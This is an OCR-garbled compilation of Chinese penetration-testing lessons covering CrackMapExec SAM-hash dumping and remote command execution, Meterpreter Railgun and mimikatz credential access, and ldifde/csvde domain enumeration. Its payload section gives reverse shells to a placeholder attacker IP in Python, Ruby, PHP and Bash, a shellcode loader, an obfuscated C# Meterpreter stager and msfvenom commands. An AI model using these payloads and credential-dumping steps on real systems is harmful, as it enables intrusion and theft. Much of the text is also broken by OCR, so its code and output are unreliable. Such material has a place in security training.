deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
M Ba] EB zx 

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib 
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib 






编辑 后 ， 更 新 即 可 


apt-get update && apt-get upgrade 


以 Sqimap 为 例 : 


‘\Users\micro>kali 
nicropoorQGLAPTOP-RJMEG6B5:-$ su 
Password: 
> micropoor cat /etc/issue 
» micropoor sqlmap 


— {1.3.7.22#dev} 


one th. LLL! 38 
llv.. |_| http://sqlmap.org 


sage: python sqlmap [options] 


sqlmap: error: missing a mandatory option (-d, -u, -1, -п, -г, -g, -с, -x, --list-tampers, --wizard, --update, --ригве о 
г --dependencies). Use -h for basic and -hh for advanced help 


至 此 ， 在 Windows 上 运行 Linux 子 系统 可 以 完全 脱离 VMwear 了 ， 资 源 占 用 更 小 ， 更 方便 ， 也 更 适用 
于 学 习 的 环境 搭建 。 


附录 : 


微软 同时 也 更 新 了 Windows Terminal ， 是 一 个 全 新 的 、 流 行 的 、 功 能 强大 的 命令 行 终端 工具 。 包 含 
很 多 来 社区 呼声 很 高 的 特性 ， 例 如 : 多 Tab 支持 、 富 文本 、 多 语言 支持 、 可 配置 、 主 题 和 样式 ， 支 
持 emoji 和 基于 GPU 运算 的 文本 泻 染 等 等 。 软 件 商城 更 新 下 载 即 可 。 
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Windows Terminal (Preview) 
Microsoft Corporation 。 开发 人 员工 具 > 实用 工具 
2 共享 2 愿望 清单 

*x*xx* 104 


EARLY PREVIEW BUILD 
This very early preview release includes many usability issues, most notably the lack of support for 
assistive technology. Much of the internal work to support this is complete and it's our top priority 


你 可 以 在 Xbox One 主机 上 购买 。 (你 所 
在 的 地 区 不 支持 通过 microsoft.com W 
EL) 
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与 CrackMapExec 结 合 攻击 


与 CrackMapExec 结 合 攻击 


注 : 请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结石 ， 痛 风 等 。 






CrackMapExec 弥 补 了 MSF4 下 auxiliary，scanner 模 块 下 的 Command 执 行 方式 ， 但 MSFS 已 解决 该 
问题 。 在 MSF4 下， 该 框架 针对 后 渗透 的 横向 移动 经 常 出 现 ， 昌 然 MSF5 已 解决 该 问题 ， 但 该 框架 在 
配合 bloodhound 与 empire 依 然 目 前 有 一 定 优势 。 


安装 方式 : from Wiki: 


Kali: 


apt-get install crackmapexec 


. 但 作者 推荐 pipenv 安 装 : 


apt-get install -y libssl-dev libffi-dev python-dev build-essential 
pip install --user pipenv 

git clone --recursive https://github.com/byt3b133d3r/CrackMapExec 
cd CrackMapExec && pipenv install 

pipenv shell 


python setup.py install 


• Mac OSX: 


pip install --user crackmapexec 


。 默认 为 100 线 程 
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a smb 192.168.1.0/24 
р 445 JOHN-PC [*] windows 7 Ultimate 7601 


192.168.1.119 445  WINO3X64 [*] Windows Server 2003 R2 2 


root@John:~# cme smb 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


* list hash 


192:168.1. 


192. 


192- 


192. 


192; 


192. 


192. 


192 


192% 


2925 


192. 


192; 


192; 


192 


192. 


192. 


192; 


192: 


1925 


168. 


168. 


168. 


168. 


168. 


168. 


.168. 


168. 


168. 


168. 


168. 


168. 


.168. 


168. 


168. 


168. 


168. 


168. 


192.168.1.119 -u administrator -p "123456" --pass-pol 


119 


2119 


2129 


119 


20119 


4129 


5119 


219 


palate) 


4229 


119 


2129 


‚119 


52249 


2119 


.119 


2429 


ой) 


3119 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


ae i 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 
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” 


[*] Windows Server 2003 






[+] WINO3X64administrator: 
[+] Dumping password info 
Minimum password length: N 
Password history length: No 


Maximum password age: 42 day 


Password Complexity Flags: € 
Domain Refuse Password C 
Domain Password Store Cl 
Domain Password Lockout 
Domain Password No Clear 
Domain Password No Anon 


Domain Password Complex: 


Minimum password age: None 
Reset Account Lockout Counte 
Locked Account Duration: 30 


Account Lockout Threshold: ^ 


root@John:~# cme smb 192.168.1.119 -u administrator -p '123456' --sam 


SMB 192.168.1.119 445 WINO3X64 [*] Windows Server 2003 R2 5 
SMB 192.1468: 1:119 445 WINOS3X64 [+] WINO3X64administrator:12 
SMB 192.168.1.119 445 МІМӨЗХ64 [*] Dumping SAM hashes 

SMB 192.168.1.119 445 WINO3X64 Administrator :500:44efce1648 
SMB 192.168. 1.119 445 WINO3X64 Guest:501:aad3b435b51404eeae 
SMB 192,168. 1.119 445 WINO3X64 SUPPORT 388945a0:1001:aad3b4 
SMB 292.1698. 1.119 445 WINO3X64 IUSR_WINO3X64: 1003: dbec20afe 
SMB 1921168. 1: 119 445 WINO3X64 IWAM WIN03X64:1004:ff783381€ 
SMB 192.168.1119 445 WINO3X64 ASPNET:1008:cc26551b70faffcG 
SMB 192.168.1.119 445 WINO3X64 [+] Added 6 SAM hashes to tr 


123456 (Pun3d!) 


13c67c 760: 
ec20afefb6cc b 22al1c400d911a4f66ff 


IWAN WIN03X64:10 4е170с59Һ1598409с laac229ddcecc fs 


ASPNE 
[+] Addi 


bb65ff: fe 24а08319а1#62с03044724 
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root@John:-# сте smb 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


SMB 


1925158541. 


192. 


192. 


192 


192 


192. 


192. 


192 


192 


192. 


192. 


192. 


192. 


192 


192. 


192 


192. 


192. 


168. 


168. 


168. 


.168. 


168. 


168. 


.168. 


.168. 


168. 


168. 


168. 


168. 


.168. 


168. 


‚168. 


168. 


168. 


192.168.1.119 -u administrator -р "123456" --local.gr 


T19 


.119 


119 


. 119 


110 


. 119 


119 


119 


1439 


2119 


22:19 


199 


‚119 


7219 


.119 


119 


‚119 


. 119 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


445 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WIN03X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINOS3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 


WINO3X64 
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[*] Windows Server 2003 
[+] WINO3X64administratg: 
[*] Enumerated local gro 
HelpServicesGroup 

IIS WPG 

TelnetClients 
Administrators 

Backup Operators 
Distributed COM Users 
Guests 

Network Configuration Operat 
Performance Log Users 
Performance Monitor Users 
Power Users 

Print Operators 

Remote Desktop Users 
Replicator 


Users 


(Pun3d!) 


menbercount : 
menbercount : 
menbercount: 0 
nenbercount : 
Backup Ü metibercount : 
Distributed COM Users menbercount : 
Guests menbercount : 
Network Configuration Operators membercoumnt: 0 
Performance Log Users member count 
Performance Monitor Users membercount: 6 
Power Users menbercount : 
Print Operators menbercount: 0 
Remote Desktop Users nenbercou 
Replicator menbercount ; 
Users E: menbercount: 3 





分 别 支持 4 种 执行 Command， 如 无 --exec-method 执 行 ， 默 认为 wmiexec 执 行 。 


。 mmcexec 
。 smbexec 
。 wmiexec 


* atexec 


。 基于 smbexec 执 行 Command 


root@John:~# cme smb 192.168.1.6 -u administrator -p '123456' --exec-method smt 





SMB 192.168.1.6 445 WIN-5BMI9HGCA42S [*] Windows Web Server 2008 

SMB 192.168.1.6 445 WIN-5BMI9HGCA2S [+] WIN-5BMI9HGC42Sadministr 

SMB 192.168.1.6 445 WIN-5BMI9HGCA42S [+] Executed command via smt 

SMB 192.168.1.6 445 WIN-5BMIQHGC42S N 999099'€9 

SMB 192.168.1.6 445 WIN-5BMI9HGC42S 

SMB 192.168.1.6 445 WIN-5BMI9HGC42S —---------5----------------- 

SMB 192.168.1.6 445 WIN-5BMI9HGCA42S Administrator Gue 

SMB 192.168.1.6 445 WIN-SBMISHGC42S €49999999444949499490994€ 
h 
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56 (Pwn3d!) 





. 基于 dcom 执 行 Command 


root@John:-# спе smb 192.168.1.6 -u administrator -p '123456' --exec-method тпс 


SMB 192.168.1.6 445 WIN-5BMI9HGCA42S [*] Windows Web Server 2008 
SMB 192.168.1.6 445 WIN-5BMI9HGCA42S [+] WIN-5BMI9HGC42Sadministr 
SMB 192.168.1.6 445 WIN-5BMI9HGCA2S [+] Executed command via mmc 
SMB 192.168.1.6 445 WIN-5BMI9HGC42S win-5bmi9hgc42sadministrator 

» 


whoani 
0 x64 (name: WIN- SEMIOH6CA42S 


23458 (Pwn3d!) 





. 基于 wmi 执 行 Command 


root@John:~# cme smb 192.168.1.6 -u administrator -p '123456' --exec-method wmi 





























SMB 192.168.1.6 445 WIN-5BMI9HGCA2S [*] Windows Web Server 2008 
SMB 192.168.1.6 445 WIN-5BMI9HGC42S_ [+] WIN-5BMI9HGC42Sadministr 
SMB 192.168.1.6 445 WIN-5BMI9HGC42S [+] Executed command via wmi 
SMB 192.26816 445 WIN-5BMI9HGC42S win-5bmi9hgc42sadministrator 
» 

HOP TIEN em ты ауа араараа 62 7000 04 (asc Ж); SEHIGHGOAOS] (бони: 59мтабс425) (sivrangiFale), (SOME 





[ULM 









SHE 
SHB 
SHB. 


445 WIN-SEMIOHGCA2S ' |+] WIN-SEMIOHGC 
448 WIN: (+f Executed com e 
4497 WIN: SEMIOH win-Ssbmighgc42sVadministrator 


© (Рип34!) 











。 基于 AT 执行 Command 


。 目标 机 : 无 运行 calc 进 程 
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FootüJohn:-4 cme smb 


SMB 


SMB 


SMB 


192.168.1. 


192.168.1. 


192.168.1. 


ers Midministrator>tasklist 


ers Midministrator>tasklist 


“хе 


192.168.1.6 
6 445 
6 445 
6 445 


ifindstr calc 


-u administrator 


WIN-5BMI9HGC42S 


WIN-5BMI9HGC42S 


WIN-5SBMISHGC42S 


ifindstr calc 


ifindstr calc 


2736 Services 





二 默认 采取 wmiexec 执 行 Command， 参 数 为 -X 


root@John:~# cme smb 


SMB 


SMB 


SMB 


SMB 


“Ë 


192.168.1. 


192.168.1. 


92:2168,1. 


292168.1. 


° ав улак 





192.168.1.6 
6 445 
6 445 
6 445 
6 445 


-u administrator 


WIN-SBMISHGC42S 


WIN-5SBMISHGC42S 


WIN-SBMI9HGC42S 


WIN-SBMISHGC42S 





-p '123456' --exec-method ate 


[*] Windows Web Server 2008 


[+] WIN-5BMI9HGC42Sadministr 


[+] Executed command via ate 


9,372 К 


-p '123456' -x 'whoami' 


[*] Windows Web Server 2008 


[+] WIN-5BMI9HGC42Sadministr 


[+] Executed command 


win-5bmi9hgc42sadministrator 


vane: WIN- SBMISHGCA2S) - (domain: WIN-5BMIOHGCA igning:Fals 


Pun3d!) 


Міп-5імі9һадс425Хадғіпі5? гайоғ 
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root@John:~# cme smb 192.168.1.6 -u administrator -p '123456' --disks 


SMB 192.168.1.6 445 WIN-5BMI9HGCA2S [*] Windows Web Server 200 








SMB 192.168.1.6 445 WIN-SBMIOHGCA2S [+] WIN - SBMISHGC42Sadministy 


SMB 192.168.1.6 445 WIN-5BMI9HGCA2S [+] Enumerated disks 
SMB 192.168.1.6 445 WIN-5BMI9HGC42S С: 
SMB 192.168.1.6 445 WIN-5BMI9HGCA2S D: 
SMB 192.168.1.6 445 WIN-5BMI9HGCA42S E: 


附录 


解决 出 现 : STATUS PIPE DISCONNECTED 





Tee) SEQ) X500 Mahon 
Фә ә хев ов 













БЕЗІН: (жш ТТТ ПТ cmd ж 
- wee Res ОВЕН ЕО 已 禁用 | 
ЕЗ 5 RS dab TOUS PROS ERT EE 已 禁用 
+ S themes БАСЕКЕ ЗЕ Та ARTS 已 禁用 
- Э 本 地 策略 沿 审 核 ， 如 果 无 法 记录 安全 审核 则 立即 关闭 系统 已 禁用 
SPRL: LAN Manager 身份 验证 级 别 ES ити OE 
-用 户 权限 上 SRS. ше ЕРЖЕЗЕЖ 协商 签名 
| p а RIMS TEE BASIN LAN Manager ROB can 
+ D iesma aane ET ти ssr (BERS URS 会 话 安全 ` 





的 景 小 会 话 安 全 











ЖРБ pem m 注销 
Bi eI: SHAM PAS aS 55 








а" ыш SAM La ril ji 

ДЕ WPR + 已 禁用 
HERDE Fic PIR ALLE SERB МЕТ Passports 已 禁用 
ЖАРЛЫ. 可 匿名 访问 的 共享 COMCEG, DFS$ 
Шал aT Usos Ss COMNAP, COMNODE, 


[A ғала es mi T uec ranas Dn ns ут б 


• 改 成 经 典 





解决 出 现 错误 : UnicodeDecodeError: 


升级 impacket 
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meterpreter 下 的 irb 操 作 第 一 季 
meterpreter 下 的 irb 操 作 第 一 季 


Railgun 是 Meterpreter stdapi 的 扩展 ， 允 许 任意 加 载 DLL。Railgun 的 最 大 好 处 是 能 够 动态 访问 系统 
上 的 整个 Windows API。 通 过 从 用 户 进程 调用 Windows АРІ, 


meterpreter > irb 
[*] Starting IFB shell 
{*] The "client" variable holds the meterpreter client 





meterpreter 下 执行 irb 进 入 ruby 交 互 。 


基本 的 信息 搜集 : 
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w Ф eco *# ' Үҙ > 









WINO3X64NAdministrator" 
erfaces - client.net.config.interfaces 


Rex: :Post::Meterpreter::Extensions::Stdapi::Net::Interface:0x000055aee92c* 


: Intel(R) PRO/1000 MT Network Connection 
+ 00:0c:29:85:d6:7d 

: 1500 

Address : 192.168.1.119 


/4 Netmask : 255.255.255.0 


: MS TCP Loopback interface 
: 00:00:00:00:00:00 

101520 

và Address : 127.0.0.1 


> [#<Rex: :Post : :Meterpreter: :Extensions::Stdapi::Net::Interface:0x000055aee92ct 
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锁定 注销 目标 机 : 


>> client.railgun.user32.LockWorkStation() 
=> ("GetLastError"=>0, "ErrorMessage"-2"XB2xD9xD7xF7xB3XC9xB9xA6XCDXEAXB3XC9xA1x 


>> 


"return" e»trüue) 





调用 MessageBox: 


>> client.railgun.user32.MessageBoxA(0, "Micropoor", "Micropoor", "MB OK") 
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Micropoor 







> client.fs.dir.pwd 


> "C:\Documents and Settings\Administrator\xE6xA1x8CxE9x9DxA2" 


录 相 关 操作 : 


>> client.fs.dir.chdir("c:\") 
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ЕШ) нш) SEWU WEW LARW 可 取出) 
2 ЖЕ + : Ж XE xw: 






2018-1-14 18:3 








jM eropoor 


Program Files (86) ЗЕ 2019-1-4 15:01 
A WINDOWS MALE 2019-1-4 14:59 
iPrencram Pilar луі 9017-12-13 19 
hash 操 作 : 


>> client.core.use "mimikatz" 


ш> true 


>> client.mimikatz 





=> $s«Rex::Post::Meterpreter::Extensions::Mimikatz::Mimikatz:0x000055aee91ceb28 6 
>> client.mimikatz.kerberos 


=> [{:authid=>"0;996", :package=>"Negotiate", :user=>"NETWORK SERVICE", :domain- 
n.a. (kerberos KO)"), {:authid=>"0;44482", :package=>"NTLM", :user=>"", :domain- 
n.a. (kerberos KO)"}, {:authid=>"0;115231", :package=>"NTLM", :user=>"Administre 
n.a. (kerberos KO)"}, {:authid=>"0;997", :package=>"Negotiate", :user=>"LOCAL SE 
n.a. (kerberos KO)"}, {:authid=>"0;999", :package=>"NTLM", :user-»"WINO3X64$", 
n.a. (kerberos KO)"}] 





内 网 主机 发 现 ， 如 路 由 ，arp 等 : 
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»» client.net.config.arp table 

=> [&«Rex::Post::Meterpreter::Extensions::Stdapi::Net:;:Arp:0x000055aee7f5f6b8 Qi 
>> client.net.config.arp table[0].ip addr 

=> "192.168.1.1" 

»» client.net.config.arp table[0].mac addr 

Б "78:44:Та: Ве: 91:59" 

>> client.net.config.arp_table[0].interface 

ЕР "65539" 

>> client.net.config.routes 


=> [#<Rex::Post::Meterpreter: :Extensions: :Stdapi: :Net: :Route:0x000055aee789be58 


@nac_add 44: fc 1:59, gintertac 
egac_add 





实战 中 的 敏感 文件 操作 ， 也 是 目前 最 稳定 ， 速 度 最 快 的 方式 : 


Euelient.fs.file.search("C: V", "*.txt") 


时 多 的 敏感 文件 操作 ， 后 续 补充 。 
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Internet E 
Pr 





更 多 相关 的 api 操 作 在 未 来 的 课时 中 介绍 。 











“ k 


第 十 课 补 充 payload( 一 ) 


"msf > use exploit/multi/handler 

“msf exploit(handler) > set payload windows/meterpreter/reverse tcp 
“payload => windows/meterpreter/reverse_tcp 

msf exploit(handler) > set LHOST 192.168.1.107 

HOST => 192.168.1.107 


ee 。 PHP 在 线 工具 М 


Missin bypasssrreate function", 1 else { eval($b); ] die();% 程序 正在 运行 中 .…… 


~ ~ Xshell 5 (Free for Иове/5сһео1) 





£ 192. 168. 1. 107:22 一 reot@John: 


` 文件 @) REO 查看 W) IAM RRES BOM 帮助 00 
一 人 8- - ө 
в 


B 





3SOCk-f sockopen ("xx . xx. xx. xx", xx) ;exec( " /bin/sh -i «&3 >&3 2>83"); 
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Ю (ШШЕ Fev) IAM Wiko DO #80) 
Ст а <° %- HO B@-m-G-a- p U8 а 85-ы- © 


2 192.168,1.107:22 + 





msf > use exploit/multi/handler 

msf exploit(handler) » set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 

msf exploit(handler) » set LHOST 192.168.1.107 

LHOST -» 192.168.1.107 


import socket,struct,time 
for x in range(10): 
Ery: 
S-socket.socket(2,socket.SOCK STREAM) 
si connect (хх, X NU XX) 
break 





except: 
time.sleep(5) | 
l=struct,unpack('>I',s.recv(4))[0] 
d=s.recv(1) 
while 1еп(4)<1: 
d+=s.recv(l-len(d)) 
exec(d, {'s':s}) 
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N 


X0) £o ЖОО 





文件 @) c SEN тат Ж 
Cm. [3 - O Grade @- A- OO UE 
n 


2 192.168,1.107:22 


» exploit 


sending stage (179267 byte 
-> 118. 31.45, 91:60760) at 


Meterpreter 2 opened (192. 1¢ 


7-12-01 07 


36: 41 





import socket, subprocess, 0s;s=socket.socket (socket .AF_INET, socket .SOCK_STREAM) ; s 


4 清空 





€ 192. 168. 1. 107:22 ~ rect@John: ft Free | 
fto) ee) BRO Tam WAE 窗口 帮助 00) 


m - ¿` m. ГО, G!-1:-G- A- ep UB 





I 


).1:107 
‚45.91 
on 4 opened (192.168.1.107:53 


Sending stage (179267 bytes) to 118.3 


Meterpreter ses -» 118.31.45.91:6! 
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0) at 2017-1: 


(?) 


7 


08:51:37 -0500 





import socket 
import subprocess 
s=socket.socket() 
s.connect ( ("Xx.Xx.XX.Xx",xx)) 
while 1: 
р = subprocess.Popen(s.recv(1024), shell-True,stdout-subprocess.PIPE, stderr- 


s.send(p.stdout.read() % p.stderr.read()) 


47 清空 yl 1 gee TL B 3 








£ 192. 168. 1. 107:22 — root@John: /tep — Xshell 5 (Е For Hos 
Mit) 编辑 G) 查看 NW) ТАТ AAEE BOM) #800 





CE-  R- HA B-a-G-A- ёр: 


“ 


2 192.168.1.107:22 i 





mof exploití ег) > exploit 


Started reverse TCP handler on 192.168.1.107:53 


Sending stage (179267 bytes) to 118.31.45.91 


删除 特征 : 
root@John:~# msfvenom -p windows/meterpreter/reverse tcp LHOST=8.8.8.8 LPORT=88 


» 
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pay 
outputting raw p 





* 


from ctypes import 
reverse shell = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xcO\x64\x8D\x50\x30\xE 


micropoorshell - create string buffer(reverse shell, len(reverse shell)) 
shellcode - cast(micropoorshell, CFUNCTYPE(c. void p)) 
shellcode() 


ruby-payload 


require 'socket';czTCPSocket.new("XXx.XX.XX.XX", x);$stdin.reopen(c);$stdout.reor 








€ 192.168. 1.107:22 — root@John: / ell 5 (Frei 
Mit) HEE) Шао IEM WAFS BOW) ЖР) 


C omi > е Ce Г.О, ш-о-69- Ay oq vieles ЕЗ [+] > 








msf exploit(handler) > exploit 


Started reverse TCP handler on 192.168.1.107:53 
Sending stage (179267 bytes) to 118.31.45.91 





require 'socket';f=TCPSocket.open("xx.xx.xx.xx",xx).to_i;exec sprintf("/bin/sh - 
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¥ 192. 168. 1. 107:22 ; 
wee) iB) SEV ІНІ) o 


CT. G- GO &-.-GQ- A- e D NA ка DD. WM- C 


кч 






> 


2192,168.1.107:22 * 





require 'socket';c=TCPSocket .new( "xx. Xx. Xx. хх", "хх" ) ;while(cmd=c. gets) ; 10. рореп( 








ZEF EE) 查看 WY ТЕАТ Жако) BOM) 88500 
ne- m. БО $92 O-4- апа ш ON- ө 


р 


2192.168.1.107:22 + 





it(handler) > exploit 


P handler on 1 
7 bytes) 


1.1) at 2017-12-01 09:14 


c=TCPSocket . new(" xx . Xx . Xx. xx", "xx") ;while(cmd=c.gets);10.popen(cmd, "r"){{io|c.pr 
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£ 192. 168. 1. 107:22 ~ root@John: / 
Tit) Жас) 查看 W) Thm EEG) BOM 帮助 00 
ГІ Іш yi Ж 8 F О, e - 59 2; . % A = € p е ә & E 1 [+] M ha 


“ 


> 
2 192.168.1.107:22 + 


exploit(ü меғ) > exploit 


Started reverse TCP handler оп 192.168 
] Sending stage (179267 bytes) to 11: 
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基于 第 十 课 补充 payload (с) 


C#-payload 


msf > use exploit/multi/handler 

msf exploit(handler) > set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 

msf exploit(handler) » set LHOST 192.168.1.107 

LHOST -» 192.168.1.107 
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> ча К, — » "$ - 
ing System; using System.Net; using System.Net.Sockets; using System.Runtime.I 
espace RkfCHtll { class LiNGeDokqnEH í 
tatic byte[] idCWVvw(string VVUUJUQytjlL, int eMcukOUqFuHbUv) í 
IPEndPoint nlttgwWAMdEQgAo = new IPEndPoint(IPAddress.Parse(VVUUJUQytjlL), eM 
Socket fzTiwdk - new Socket(AddressFamily.InterNetwork, SocketType.Stream, F 
try ( fzTiwdk.Connect(nlttgWAMdEQgAo); ) 
catch ( return null;} 
byte[] gJVVagJmu = new byte[4]; 
a fzTiwdk.Receive(gJVVagJmu, 4, 0); 
int GFxHorfhzft - BitConverter.ToInt32(gJVVagJmu, 0); 
byte[] mwxyRsYNn = new byte[GFxHorfhzft + 5]; 
int yVcZAEmXaMszAc = 0; 
while (yVcZAEmXaMszAc « GFxHorfhzft) 
í yVcZAEmXaMszAc += fzTiwdk.Receive(mwxyRsYNn, yVcZAEmXaMszAc + 5, (GFxHorft 
byte[] XEvFDc = BitConverter.GetBytes((int)fzTiwdk.Handle); 
Array.Copy(XEvFDc, ©, mwxyRsYNn, 1, 4); mwxyRsYNn[O] = OxBF; 
|... return mwxyRsYNn; } 
static void hcvPkmyIZ(byte[] fPnfqu) { 
if (fPnfqu != null) { 
UInt32 hcoGPUltNcjK = VirtualAlloc(0, (UInt32)fPnfqu.Length, 0х1000, 0x4 
Marshal.Copy(fPnfqu, 0, (IntPtr)(hcoGPUltNcjK), fPnfqu.Length); 
IntPtr xOxEPnqw = IntPtr.Zero; 
UInt32 001171М20 = 0; 
IntPtr wxPyud - IntPtr.Zero; 
xOxEPnqw = CreateThread(0, ©, hcoGPUltNcjK, wxPyud, 0, ref ooiiZLMzO); 
WaitForSingleObject(xOxEPnqW, OxFFFFFFFF); 33 
static void Маіп()( 
Р byte[] dCwAid = null; dCwAid = idCWVw( "хх. хх. хх. хх", xx); 
. hcvPkmyIZ(dCwAid); ) 
[DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 
DllImport ("kerne132")]private static extern IntPtr CreateThread(UInt32 tqUXybrc 
)llImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr 
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XO) iG) ШЕ ТАТ AAEE DOO ФИЛО) 


nu ma. e m. Do $-2-OG-A- еске 


1192.168.1.107:22 





Bash-payload 


i »& /dev/tcp/Xxx.Xx.XX.XX/xx 0>&1 









(Eres for i 
文件 @) HER) BHO IA WAED BOM 800 


Cm - ¿` fe fO -H-O A- 6 P UNA i PES | 


теі exploit(bandler) > exploit 





exec 5«»/dev/tcp/Xx.XX.XX.XX/XX 
cat <&5 | while read line; do $line 2>&5 >&5; done 
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S BS rry | i Y 













文件 位) Жаңа) 

Cm. .` мев G. -e 
> 

Ф 1192.168.1.107:22 * 


exploit(handler) » exploit 


[+1 Started reverse TCP handler on 
[*] Se 5 е (179779 byte 3 © 
[*] Mete ter ° n 1 opened (1 535-9» 8.31.45.91: 32914) а 





msfvenom 生成 bash 
root@John:~# msfvenom -p cmd/unix/reverse bash 1Н05Т-хх.хх..хх.хх LPORT-xx > -f 


参数 简化 
项 目地 址 : https://github.com/gOtmiik/mpc 


lil Missing TYPE or BATCH/LOOP mode 


Foc. sh <TYPE> (<DOMAIN/TP PORT>) (-CMD/MSE-) (-BIND/REVERSE (<STAGED /STAGELESS>} TCP/HTTP/HTTPS/FIND PORT-) (<BATCH/LOOP>) 
."msfpc.sh windows 192.168.1.16 $ manua 
.'nsfpc.sh elf bind eth0 4444 
sh 512461656 cad py https 
sh verbose loop ethl 
sh esf batch wan 
.Sh help verbose 


: jsp! 
* Linux [.elf 


|. psi} 
Python | 
Toncat 
Windows | 
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els 息 收 集 之 普通 域 用 户 权限 获取 域 里 详细 信息 -ldifde 
Г 


前 沿 


适用 场景 : 内 网 环境 有 域 环境 ， 掌 握 一 个 域 用户 的 账号 密码 
ТЕН: 能 够 把 域 里 面 的 所 有 信息 导出 来 ( 域 用 户 域 机 器 等 详细 信息 ) 


使 用 


ldifde.exe -f 导出 的 文件 名 -s 域 控 IP -b 普通 域 用 户 名 域名 普通 域 用 户 密码 
ldifde.exe -f out.ldf -s 192.168.52.2 -b iis user hack iqaz@wSX 


С: Users Mdministrator\WDesktop>ldifde.exe -f out.1df -s 192.168.52.2 -b iis user hack iqgaz@WSk 
Connecting to “192.168.52.2" 

Logging in as "iis_ user" in domain “hack” using SSPI 

Exporting directory to file out .ldf 

Searching for entries... 

dt Vt A атои N ША ЫЫ ааа ао аан оао анаа ааа К = ~ 
254 entries exported 


The command has completed successfully 











ВР: 





ccountName" (62 hits in 1 file) 





: Administrator 
















2146: ЗАМА 

2785: ЗАМА Guest 

2821: ЗАМА DefauitAccoun 
Є 2885: ЗАМА Administrators 
|] 2915: ЗАМА Users 

2979: «АУ Guests 

3005: = Print Operators 

2033: s Backup Operators 
e 3059: s Repiicator 











m 
өз 
© 
го 
D 
ta 
EE 


о оз о 
prot ә 
о о 
м de 
ш іл Із та Un 
^ а 
2 2 







" 


4 
54 z 
; 


p 
A 


я 
71 








A 


a 
> 


керек 


ЕЕ 
2 


е 3335: 
ine 3365: 
e 3394: 
e 3420: 
Line 3447: 
Line 3475: 
ELine 3501: зАМА: 
Line 3528: зАМА 

Line 3591: sAMA WINDOWS SERVER S 


e cm Tv E T ONT w 


Endpoint 5 
RDS Management 


шо 
2009 
Oty Uo 14 


555 


A- 





a 
ж 


Ассезз С 


E 


ш ig ш ә ш ú & U 15 
pe 
v 


t 


д 
= 


ш 
р 























5 hits 


Tch "dNSHostNane" 





3592: 
Line 5069: dNSHostName: 
Line 5165: dNSHostName: 
8213: 
5264: 





各 种 详细 的 信息 ， 可 以 自行 深入 研究 
所 在 组 ， 上 次 登陆 时 间 等 
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Yiout.idf {62 hits) 


Remote Desktop Users 
Network Configuration Operators 


Monitor 


Assistance 
Remote Manacement Users 

System Managed Accounts Group 
Storage Replica Administrator 


ktop\out. 


Users 


Log Users 
i COM Users 


ryptogza aphic Cperators 

og Readers 

rti РА cate Service 
Remote Access Ser 


DCOM Access 











istrators 


Operator 


(5 m in 1 file) 

ldf (5 hits) 

pT eee ang Tr eene pee 
exch-01 .hack.local 
WINOS-WEB.hack.local 

dNSHostName: wini2-IiS.hack.local 

dNSHostName: WIN7-PC.hack.locai 
"eAMAn^econnntName" IA? hite in 1 fila! 


objectClass: person 
abjectClass: n 
objectClass: user 
ср: Administ o 
description 566n55CS6K6n566X5py6KONWfnynnmoTl1noXnva71luJDmiLc= 
distinguishedName: CN=Administrator, CN=Users, DC=hack, DC=locai 
instanceType: 4 








whenCreated: 20190805044216.02Z 
0292226055441 .02 


2 
wnenChanged: 2 
г 





memberOf: Ci oup Policy Creator Owners,CN-Users,DC-hack,DC-l0cal 
memberCf: CN=Domain Adhins,CNeUsers, pcshast) DC=local 

memberOf: CN-Enterprise Admins,CN-Users,DC-hack,DC-10cal 
memberOf: CN=Schema Admins, CN=Users, DC=hack, DC=local 

memberOf: CN=Administrators, CN=Byijtin, DC=hack, DC=local 





name = Аатшызартасог 
ObjectGUID:: 
userAccountCon Mie 
badPwdCount: O 
codePace: 2 
countryCode: O 
badPasswordTime: 132198194251843489 
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x jj 
pwdLastSet: 1321939408172128219 
primaryGroupID: 513 
obtectSid:: AQUAAAALALUVAAAADLQ7XPmEhV.GMANV-9AEAAA-- 
adminCount: 1 


accountExpires 
logonCount: 83 
shMAccountName: 
sAMAccountType 

Ob3ectCategory: CN=Person, CN=Schema, CN=Configuration, DC=nack, DC=local 
isCriticalSystemObject: TRUE 





dSCorePropagationData: 20190805073610.92 

SCorePropagationData: 20190805044607.02 
dSCorePropagationData: 16020101000426.02 
lastLogonTimestamp: 132193940379705214 
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域 信息 收集 -csvde 工 具 
前 治 


管理 AD 上 的 用 户 ， 一 般 使 用 CSVDE、LDIFD、Poweshell 等 命令 行 工具 ， 具 体 的 可 以 在 cmd 中 通 
过 2 参数 来 查看 使 用 说 明 。 上 篇 介绍 了 Idifd， 这 篇 介绍 csvde。 


使 用 


使 用 csvde 获 取 域 里 面 各 个 对 象 的 详细 信息 
csvde -setspn 域名 -f 导出 文件 地 址 


csvde -setspn hack -f c:\windows\temp\hack.csv 


F ci \windows\temp\hack. csv 





LDAP 的 存储 规则 


